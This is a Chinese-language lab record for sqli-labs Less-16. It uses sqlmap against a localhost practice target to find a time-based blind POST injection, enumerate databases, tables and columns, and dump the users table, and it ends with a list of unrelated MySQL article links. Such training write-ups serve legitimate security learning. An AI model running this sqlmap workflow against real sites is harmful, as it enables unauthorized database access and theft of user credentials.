sqli-labs-Less-16自动化注入方法

sqli-labs 实验记录

Less-16

第一步:进行sqli注入漏洞检测

输入命令:

复制代码
sqlmap -u http://localhost/Less-16/?id=1 --batch --forms

--batch 表示采用默认参数。
--forms 表示自动提交表单。

查询结果如图所示:存在注入点uname,注入方式为POST,注入类型为:time-based blind; 并给出了相应的payload。

第二步:查询服务器中的所有数据库

输入命令:

复制代码
sqlmap -u http://localhost/Less-16/?id=1 --batch --forms --dbs

--dbs 表示查询数据库。

查询结果如图所示:数据库共有7个,分别为information_schema, performance_schema, sys, sqli, security, challenges, mysql。

第三步:查询指定数据库中的所有表

输入命令:

复制代码
sqlmap -u http://localhost/Less-16/?id=1 --batch --forms -D security --tables

-D security 表示指定查询数据库security;
--tables 表示查询数据库中的所有表。

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的所有列

输入命令:

复制代码
sqlmap -u http://localhost/Less-16/?id=1 --batch --forms -D security -T users --columns

-T users 表示指定查询数据表users;
--columns 表示查询数据表中的所有列。

查询结果如图所示:数据列共有3个,分别是id, password, username。

第五步:查询指定数据表中的具体信息

输入命令:

复制代码
sqlmap -u http://localhost/Less-16/?id=1 --batch --forms -D security -T users --dump

--dump 表示查询数据表中的具体信息

查询结果如图所示:数据表users中的具体信息共有13条。

相关推荐
这个DBA有点耶1 天前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung1 天前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
数据技术说1 天前
MySQL 迁移实战——如何实现真正的"零改造"平滑切换
mysql
唐青枫5 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
小满8785 天前
5.Mysql事务隔离级别与锁机制
mysql
元Y亨H6 天前
技术笔记:MySQL 字符集排序规则与大小写敏感性问题解决方案
mysql
这个DBA有点耶7 天前
GROUP BY优化全解:如何写出既不丢数据又飞快的分组查询
数据库·mysql·架构
掉头发的王富贵7 天前
【StarRocks】极限十分钟入门StarRocks
数据库·sql·mysql
SamDeepThinking7 天前
一条UPDATE语句在MySQL 8.0中到底加了几把锁?
后端·mysql·程序员
李白客9 天前
KES新版MySQL兼容能力再升级意味着什么?
mysql·国产数据库